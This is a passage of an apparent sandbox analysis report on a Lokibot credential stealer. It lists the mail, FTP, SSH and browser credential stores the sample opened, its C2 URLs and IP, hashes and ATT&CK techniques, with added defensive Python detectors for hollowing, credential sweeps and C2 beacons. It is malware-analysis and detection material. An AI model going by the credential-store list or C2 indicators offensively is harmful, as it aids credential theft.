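    # The PE header landing in the child is the necessary condition; the rest raise confidence.
    return [f for f in findings.values() if any(s.startswith("PE header") for s in f.signals)]


if __name__ == "__main__":
    for f in detect_hollowing(parse_trace(SAMPLE_TRACE)):
        print(f"pid {f.parent} hollowed pid {f.child} ({f.image}), score {f.score()}:")
        for s in f.signals:
            print("  -", s)
```

On the constructed trace the detector reports a single finding, parent 4640 against child 5684, with five signals; the parent's own write at 0x2430000 and the unrelated 1234-to-5678 write do not appear. In a real pipeline the same logic applies to Sysmon event 8/10 or ETW process-access telemetry once the child-creation relationship is joined in.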

              Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match, file source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\U001P56ybm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\U001P56ybm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\U001P56ybm.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\U001P56ybm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\U001P56ybm.exe Key opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\U001P56ybm.exe Key opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\U001P56ybm.exe Key opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\U001P56ybm.exe Key opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: PopPassword
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: SmtpPassword
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: PopPassword
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: SmtpPassword
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\U001P56ybm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match, the same unpacked PE and memory-dump sources listed under "Yara detected Lokibot" above (all entries except the 005D8000 dump and the two Process Memory Space entries)
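The registry keys and the Chrome Login Data file opened above form a catalogue of third-party credential stores: IncrediMail and Outlook mail profiles, KiTTY and WinSCP (the "Martin Prikryl" key) sessions, Far Manager, ClassicFTP and BlazeFtp host lists, and the browser's saved logins. Any single access can be benign (Outlook reads its own profile key, Chrome reads its own Login Data); what marks a stealer is one process sweeping stores that belong to many unrelated applications. The script below is an added example, not report or malware code: it classifies constructed access events in a "time|process image|operation|path" layout assumed for the example against the stores named in this report, discounts the application assumed to own each store (the owner executable names are this example's assumption, not report data), and reports any process that touches at least two foreign stores.

```python
from collections import defaultdict

# Credential stores named in the report above, with the application assumed to own each.
# The owner executable names are an assumption made for this example, not report data.
CREDENTIAL_STORES = [
    # (store, owner executable, substring matched case-insensitively against the path)
    ("IncrediMail identities", "incmail.exe",    r"\Software\IncrediMail\Identities"),
    ("Outlook MAPI profiles",  "outlook.exe",    r"\Windows Messaging Subsystem\Profiles\Outlook"),
    ("KiTTY sessions",         "kitty.exe",      r"\Software\9bis.com\KiTTY\Sessions"),
    ("WinSCP sessions",        "winscp.exe",     r"\Software\Martin Prikryl"),
    ("Far Manager FTP hosts",  "far.exe",        r"\Plugins\FTP\Hosts"),
    ("ClassicFTP accounts",    "classicftp.exe", r"\NCH Software\ClassicFTP\FTPAccounts"),
    ("BlazeFtp settings",      "blazeftp.exe",   r"\FlashPeak\BlazeFtp\Settings"),
    ("Chrome saved logins",    "chrome.exe",     r"\Google\Chrome\User Data\Default\Login Data"),
]

# Constructed access events (time|process image|operation|path); not real telemetry.
# The first six mirror the report's key/file accesses, the last three are benign controls.
SAMPLE_EVENTS = r"""
18:22:30|C:\Users\user\Desktop\U001P56ybm.exe|RegOpenKey|HKCU\Software\IncrediMail\Identities
18:22:30|C:\Users\user\Desktop\U001P56ybm.exe|RegOpenKey|HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
18:22:31|C:\Users\user\Desktop\U001P56ybm.exe|RegOpenKey|HKCU\Software\9bis.com\KiTTY\Sessions
18:22:31|C:\Users\user\Desktop\U001P56ybm.exe|RegOpenKey|HKCU\Software\Martin Prikryl
18:22:31|C:\Users\user\Desktop\U001P56ybm.exe|RegOpenKey|HKCU\Software\Far2\Plugins\FTP\Hosts
18:22:32|C:\Users\user\Desktop\U001P56ybm.exe|FileOpen|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
18:22:40|C:\Program Files\Google\Chrome\Application\chrome.exe|FileOpen|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
18:22:41|C:\Program Files (x86)\WinSCP\winscp.exe|RegOpenKey|HKCU\Software\Martin Prikryl\WinSCP 2\Sessions
18:22:42|C:\Windows\explorer.exe|RegOpenKey|HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer
"""


def classify_path(path: str):
    """Return (store, owner) when the path is a known credential store, else None."""
    p = path.lower()
    for store, owner, needle in CREDENTIAL_STORES:
        if needle.lower() in p:
            return store, owner
    return None


def parse_events(text: str) -> list:
    """Split 'time|image|operation|path' lines into tuples; malformed lines are dropped."""
    events = []
    for line in text.strip().splitlines():
        parts = line.split("|", 3)
        if len(parts) == 4:
            events.append(tuple(parts))
    return events


def foreign_store_accesses(events: list) -> dict:
    """Map each process image to the set of credential stores it touched but does not own."""
    touched = defaultdict(set)
    for _time, image, _op, path in events:
        hit = classify_path(path)
        if hit is None:
            continue
        store, owner = hit
        if image.lower().rsplit("\\", 1)[-1] == owner:
            continue  # the owning application reading its own store
        touched[image].add(store)
    return touched


def find_credential_sweeps(events: list, min_stores: int = 2) -> dict:
    """Processes reading at least min_stores foreign stores: a sweep, not a one-off access."""
    return {img: sorted(stores)
            for img, stores in foreign_store_accesses(events).items()
            if len(stores) >= min_stores}


if __name__ == "__main__":
    for image, stores in find_credential_sweeps(parse_events(SAMPLE_EVENTS)).items():
        print(f"{image} swept {len(stores)} foreign credential stores:")
        for s in stores:
            print("  -", s)
```

On the constructed events only U001P56ybm.exe is reported, with six foreign stores; chrome.exe and winscp.exe are dropped as owners of what they read. The breadth threshold is the useful knob: a single foreign read is common for backup and migration tools, whereas three or more unrelated stores from one unsigned desktop binary rarely has an innocent explanation.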

              Remote Access Functionality:

Yara detected Lokibot
Source: Yara match, the same 25 sources listed under "Yara detected Lokibot" in Stealing of Sensitive Information above

              Mitre Att&ck Matrix

Columns are the ATT&CK tactics; a trailing number after a technique is the report's signature hit marker, meaning that technique was observed in this analysis, while techniques without a number are the unmatched cells of the standard matrix.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API (1) | Path Interception | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (1) | OS Credential Dumping (2) | Account Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection (112) | Obfuscated Files or Information (2) | Credentials in Registry (2) | File and Directory Discovery (2) | Remote Desktop Protocol | Data from Local System (2) | Exfiltration Over Bluetooth | Encrypted Channel (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing (1) | Security Account Manager | System Information Discovery (15) | SMB/Windows Admin Shares | Email Collection (1) | Automated Exfiltration | Non-Application Layer Protocol (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading (1) | NTDS | Security Software Discovery (13) | Distributed Component Object Model | Clipboard Data (1) | Scheduled Transfer | Application Layer Protocol (111) | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (11) | LSA Secrets | Process Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (11) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection (112) | DCSync | System Owner/User Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

Observed techniques by tactic, extracted from the matrix above:
Execution: Native API
Privilege Escalation: Access Token Manipulation, Process Injection
Defense Evasion: Deobfuscate/Decode Files or Information, Obfuscated Files or Information, Software Packing, Masquerading, Virtualization/Sandbox Evasion, Access Token Manipulation, Process Injection
Credential Access: OS Credential Dumping, Credentials in Registry
Discovery: Account Discovery, File and Directory Discovery, System Information Discovery, Security Software Discovery, Process Discovery, Virtualization/Sandbox Evasion, System Owner/User Discovery
Collection: Archive Collected Data, Data from Local System, Email Collection, Clipboard Data
Command and Control: Ingress Tool Transfer, Encrypted Channel, Non-Application Layer Protocol, Application Layer Protocol
Impact: System Shutdown/Reboot

              Behavior Graph

              Screenshots

              Thumbnails


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
U001P56ybm.exe | 25% | ReversingLabs | Win32.Trojan.Nsisx

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll | 23% | ReversingLabs | Win32.Trojan.Tedy

              Unpacked PE Files

Source | Detection | Scanner | Label
2.0.U001P56ybm.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.U001P56ybm.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
2.0.U001P56ybm.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.U001P56ybm.exe.2430000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.1.U001P56ybm.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
http://194.85.248.167/imt/fre.php | 100% | Avira URL Cloud | malware
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://194.85.248.167/imt/fre.php | true | Avira URL Cloud: malware | unknown
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown

The "Malicious = true" verdict comes from the C2 configuration extracted from the sample, not from the reputation services: a "safe" reputation verdict only means the service has not flagged that URL, not that it is benign. All five share the Lokibot C2 path convention (plain HTTP, path ending in fre.php), but only the 194.85.248.167 endpoint was actually contacted during this run (see Contacted IPs below); the four domain-based URLs were recovered from the binary and memory.

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_Error | U001P56ybm.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | U001P56ybm.exe | false | | high
http://www.ibsensoftware.com/ | U001P56ybm.exe, 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

The nsis.sf.net strings are the standard NSIS installer error message, consistent with the ReversingLabs Win32.Trojan.Nsisx label on the dropper. The ibsensoftware.com string is the copyright URL embedded by the aPLib compression library, consistent with the aPLib-compressed payload signature; neither is a C2 indicator.

                  Contacted IPs


                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
194.85.248.167 | unknown | Russian Federation | 35478 | DATACENTERRO | true
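The C2 URLs in this report are the indicators a defender would push to a proxy or NetFlow search, but they need two refinements: URL matching has to survive trivial variations (case, an explicit :80 port), and the four domain-based URLs that were only found in memory deserve a different label from the endpoint that was actually contacted. The scanner below is an added example and not part of the report: it normalises URLs from constructed proxy-log lines (a "client method url status" layout assumed for the example), matches them against the report's IOCs with the contacted/embedded distinction, and adds a lower-confidence heuristic for plain-HTTP POSTs to an unknown host whose path ends in /fre.php, the shape every C2 URL in this report shares.

```python
from urllib.parse import urlsplit

# C2 URLs from the report. The first was actually contacted during the run (see Contacted
# IPs); the other four were only recovered from the binary and memory.
CONTACTED_C2 = {"http://194.85.248.167/imt/fre.php"}
EMBEDDED_C2 = {
    "http://kbfvzoboss.bid/alien/fre.php",
    "http://alphastand.win/alien/fre.php",
    "http://alphastand.trade/alien/fre.php",
    "http://alphastand.top/alien/fre.php",
}


def normalize(url: str) -> str:
    """Canonical form for matching: lower-cased scheme and host, default port and query dropped."""
    s = urlsplit(url.strip().lower())
    return f"{s.scheme}://{s.hostname or ''}{s.path}"


IOC_INDEX = {normalize(u): "contacted C2" for u in CONTACTED_C2}
IOC_INDEX.update({normalize(u): "embedded C2 (found in binary/memory only)" for u in EMBEDDED_C2})

# Constructed proxy-log lines (client method url status); not real traffic.
SAMPLE_PROXY_LOG = """\
10.0.0.12 POST http://194.85.248.167/imt/fre.php 404
10.0.0.12 POST http://194.85.248.167:80/imt/fre.php 404
10.0.0.12 POST http://ALPHASTAND.win/alien/fre.php 502
10.0.0.15 GET http://www.ibsensoftware.com/ 200
10.0.0.20 POST http://203.0.113.9/panel/fre.php 200
10.0.0.21 GET https://example.org/fre.php?x=1 200
"""


def classify_request(method: str, url: str):
    """Exact IOC match first; otherwise the fre.php POST heuristic; None when neither applies."""
    verdict = IOC_INDEX.get(normalize(url))
    if verdict:
        return verdict
    s = urlsplit(url.lower())
    # Every C2 URL in the report is a plain-HTTP endpoint ending in /fre.php; Lokibot
    # reports to it with POST. Unknown hosts with that shape are worth a second look.
    if method.upper() == "POST" and s.scheme == "http" and s.path.endswith("/fre.php"):
        return "heuristic: Lokibot-style fre.php POST"
    return None


def scan_proxy_log(text: str) -> list:
    """Return (client, url, verdict) for every line that matches an IOC or the heuristic."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        client, method, url, _status = parts
        verdict = classify_request(method, url)
        if verdict:
            hits.append((client, url, verdict))
    return hits


if __name__ == "__main__":
    for client, url, verdict in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client}  {url}  ->  {verdict}")
```

On the constructed log the two 194.85.248.167 requests (with and without the explicit port) match the contacted C2, the upper-cased alphastand.win request matches an embedded C2, the unknown 203.0.113.9 POST is reported by the heuristic only, and the HTTPS GET and the aPLib copyright URL produce nothing. The heuristic is deliberately weak on its own; its value is in surfacing a successor C2 once the operator rotates the host while keeping the panel path.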

                  General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528740
Start date: 25.11.2021
Start time: 18:21:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: U001P56ybm.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/4@0/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 63.3% (good quality ratio 61.1%)
• Quality average: 78.7%
• Quality standard deviation: 27.6%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• HTTP Packets have been reduced
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/528740/sample/U001P56ybm.exe

                  Simulations

                  Behavior and APIs

Time | Type | Description
18:22:21 | API Interceptor | 48x Sleep call for process: U001P56ybm.exe modified

                  Joe Sandbox View / Context

                  IPs

                  Match | Associated Sample Name / URL | Detection | Context
                  194.85.248.167 | xA7ry4Ewuk.exe | malicious | 194.85.248.167/imt/fre.php
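
The context entry above gives the C2 URL this sample shares with an earlier submission (194.85.248.167/imt/fre.php), and the Snort alerts under Network Behavior show the same host being hit over plain HTTP on port 80 every few seconds, with rule 2021641 ("LokiBot User-Agent (Charon/Inferno)") and 2025483 ("LokiBot Fake 404 Response") firing on each exchange. The script below is an added example, not part of the sandbox report or of the Emerging Threats rule set: it applies those observations to proxy log lines so the same infection can be found in an environment without Snort. The log layout is a made-up CLF-with-User-Agent format, the sample lines are constructed, and the literal User-Agent `Mozilla/4.08 (Charon; Inferno)` is the string the ET rule is understood to match; the report itself names only the rule.

```python
"""LokiBot C2 check-in triage over HTTP access-log lines.

Added example (not from the sandbox report). Indicators taken from the report:
C2 host 194.85.248.167, URI /imt/fre.php, plain HTTP/80, check-ins a few
seconds apart, a 404 answer to every check-in. Assumption: the stealer's
User-Agent is the literal "Mozilla/4.08 (Charon; Inferno)" that ET 2021641
is understood to match.
"""
import re
from datetime import datetime

C2_HOSTS = {"194.85.248.167"}             # from the report
C2_URI_SUFFIX = "fre.php"                  # from the report
LOKI_UA = "Mozilla/4.08 (Charon; Inferno)"  # assumption, see module docstring
BEACON_MAX_GAP_S = 10.0                    # report shows check-ins 1.5-3 s apart

# Made-up access-log layout: src [time] "METHOD http://host/path HTTP/x" status size "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'http://(?P<host>[^/ ]+)(?P<path>\S*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+) "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not captured traffic): one infected host checking
# in three times, one benign browser hitting an unrelated 404.
SAMPLE_LOG = """\
192.168.2.3 [25/Nov/2021:18:22:15 +0000] "POST http://194.85.248.167/imt/fre.php HTTP/1.0" 404 312 "Mozilla/4.08 (Charon; Inferno)"
192.168.2.3 [25/Nov/2021:18:22:18 +0000] "POST http://194.85.248.167/imt/fre.php HTTP/1.0" 404 312 "Mozilla/4.08 (Charon; Inferno)"
192.168.2.7 [25/Nov/2021:18:22:19 +0000] "GET http://example.org/missing HTTP/1.1" 404 512 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.2.3 [25/Nov/2021:18:22:21 +0000] "POST http://194.85.248.167/imt/fre.php HTTP/1.0" 404 312 "Mozilla/4.08 (Charon; Inferno)"
"""


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def request_indicators(rec):
    """Per-request indicators: known C2 host, POST to fre.php, stealer UA,
    and a 404 answering a request that already carries the stealer UA
    (the pattern Snort 2025483 'LokiBot Fake 404 Response' fires on)."""
    hits = set()
    if rec["host"] in C2_HOSTS:
        hits.add("known_c2_host")
    if rec["method"] == "POST" and rec["path"].endswith(C2_URI_SUFFIX):
        hits.add("post_to_fre_php")
    if rec["ua"] == LOKI_UA:
        hits.add("charon_inferno_ua")
    if rec["status"] == 404 and "charon_inferno_ua" in hits:
        hits.add("fake_404_to_checkin")   # any lone 404 is not an indicator
    return hits


def triage(log_text):
    """Group requests per source host; add a beacon indicator when the same
    (host, path) is requested again within BEACON_MAX_GAP_S seconds."""
    per_src = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_src.setdefault(rec["src"], {"reasons": set(), "count": 0, "last": {}})
        hits = request_indicators(rec)
        key = (rec["host"], rec["path"])
        last = entry["last"].get(key)
        if last is not None and (rec["ts"] - last).total_seconds() <= BEACON_MAX_GAP_S:
            hits.add("short_interval_beacon")
        entry["last"][key] = rec["ts"]
        if hits:
            entry["reasons"] |= hits
            entry["count"] += 1
    return {src: {"reasons": sorted(e["reasons"]), "flagged_requests": e["count"]}
            for src, e in per_src.items() if e["reasons"]}


if __name__ == "__main__":
    for src, verdict in triage(SAMPLE_LOG).items():
        print(src, verdict)
```

The UA and URI checks alone would have caught this sample; the interval check is there because LokiBot operators rotate hosts and paths between campaigns, while the tight check-in loop visible in the alert timestamps (a new source port every one to three seconds) survives those changes.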

                  Domains

                  No context

                  ASN

                  Match | Associated Sample Name / URL | Detection | Context
                  DATACENTERRO | mtSgtqMMFl.exe | malicious | 194.85.248.229
                  DATACENTERRO | W7UbgU8x18.exe | malicious | 194.85.248.219
                  DATACENTERRO | SK TAX INV.exe | malicious | 194.85.248.250
                  DATACENTERRO | xA7ry4Ewuk.exe | malicious | 194.85.248.167
                  DATACENTERRO | Sales Pro forma invoice_SO0005303101427.docx | malicious | 194.85.248.219
                  DATACENTERRO | Statement from QNB.exe | malicious | 194.85.248.156
                  DATACENTERRO | CV.exe | malicious | 194.85.248.250
                  DATACENTERRO | INV.exe | malicious | 194.85.248.250
                  DATACENTERRO | CV.exe | malicious | 194.85.248.250
                  DATACENTERRO | TMR590241368.exe | malicious | 194.85.248.115
                  DATACENTERRO | vIyyHkRXJn | malicious | 194.85.250.154
                  DATACENTERRO | 267A80yAhp | malicious | 194.85.250.154
                  DATACENTERRO | QJYxAALd23 | malicious | 194.85.250.154
                  DATACENTERRO | z4bJfjXDDQ | malicious | 194.85.250.154
                  DATACENTERRO | XXaLHoecGp | malicious | 194.85.250.154
                  DATACENTERRO | AGiCic4uDz | malicious | 194.85.250.154
                  DATACENTERRO | 3B3BMxYG8n | malicious | 194.85.250.154
                  DATACENTERRO | 6WMo1OYmk3 | malicious | 194.85.250.154
                  DATACENTERRO | dycuTng5W8 | malicious | 194.85.250.154
                  DATACENTERRO | xINX4f5M8s | malicious | 194.85.250.154

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\9bx9q99412rjuw5u
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):217431
                  Entropy (8bit):7.987953901401436
                  Encrypted:false
                  SSDEEP:6144:/KdbhrnUV0fmvApS9oPiEPS3nwOJ2WF9WjNZHq98e2:/crneIEKqN2GWj3r
                  MD5:1B63DA395BAFC5116F3F6FF8AAD7A350
                  SHA1:372869F185066FED68D1573158761EB4859459DB
                  SHA-256:19D7869C47AF19341916AE58B2F82536CF130942C05DFEE3092C65CD0C9E897B
                  SHA-512:E9D93E22D5D4C547A80ACF658C4F2A6409CD00E88F73602789FEED597BEBB6073EEDDBE6A4439C3EC11A26C9EE5D9FF341BB1F8888BFEA751DFA7921E8FA5714
                  Malicious:false
                  Reputation:low
                  Preview: q.........Vl:....m.G.g...0.?#....P....`ZmNwW]&.?..s.........3J.I....".5...W....]A..&..yu....<..WP..........'g..$E...RU.`x.K.mlo.....|..t(Z.JV 4.....q..%M..h..H@]...C.0......2. )=I....n..LX.A..^.x....~!+q...6..J.6..Y.R..q.)4."..+.B.x>..R.,.d...4.<.".Vz0V.O..:...G.g..i0..#....P....`.mNw*]&j?..s...&.n.D.3J..\..`......$....v..'.,...I........o.)....z#..BL9R._..E...RU.]........p........M.i............^....!l2...o+Z...i...4.....e.{....G.B..nH.M..A.Z..c\.T..D....=g.;S.h."....B<.'...&.,.d...4.u....V'...d....g..j.0......P....`ZmNwW]&.?..{....t.b.3J.!X.....:..9. ....v..'.,...].+...o.)....z..a.`9.....E...RU.]......}...p........M.i............^....!l2...o+Z...i...4.....e.{...r.....nH.M..A.Z..c\.T..D....=g..q.)4.".0..B<.'.....,.d...4.u....V....:.m.G.g..0.?#....P....`ZmNwW]&.?..s.......D.3J.....q.....9$.....v..'.,..I........o.)....z#.a.`9.._..E...RU.]........p........M.i............^....!l2...o+Z...i...4.....e.{...r.....nH.M..A.Z..c\.T..D....=g.
                  C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):120320
                  Entropy (8bit):6.283877419444271
                  Encrypted:false
                  SSDEEP:1536:DkJ/CJk6kcjZwfqMkzLaRJ+cxfNdtTisu01vzG4CNrutUo7HC5mo5wTIDLmUleNg:c6+sz2+cjdx1lmNE7i5IIXRlCi3nJ
                  MD5:7464D22DB87D13EBEF8364866100E33C
                  SHA1:6A64B31B7EE5F853A1CC142D0B3300A796D21B28
                  SHA-256:8142F4110C4DAF020DF138E7A281FD19A3295AF855D7527177E5DAB204EE9D8F
                  SHA-512:E7366C3617B958B3A4FA55548DCE997BD335D7B871494154BA9BDFD077B4C2488D80C9EA571D171B3CCFC18A579ECE85E76AE54C14AF33306BB50AB48BF32631
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 23%
                  Reputation:low
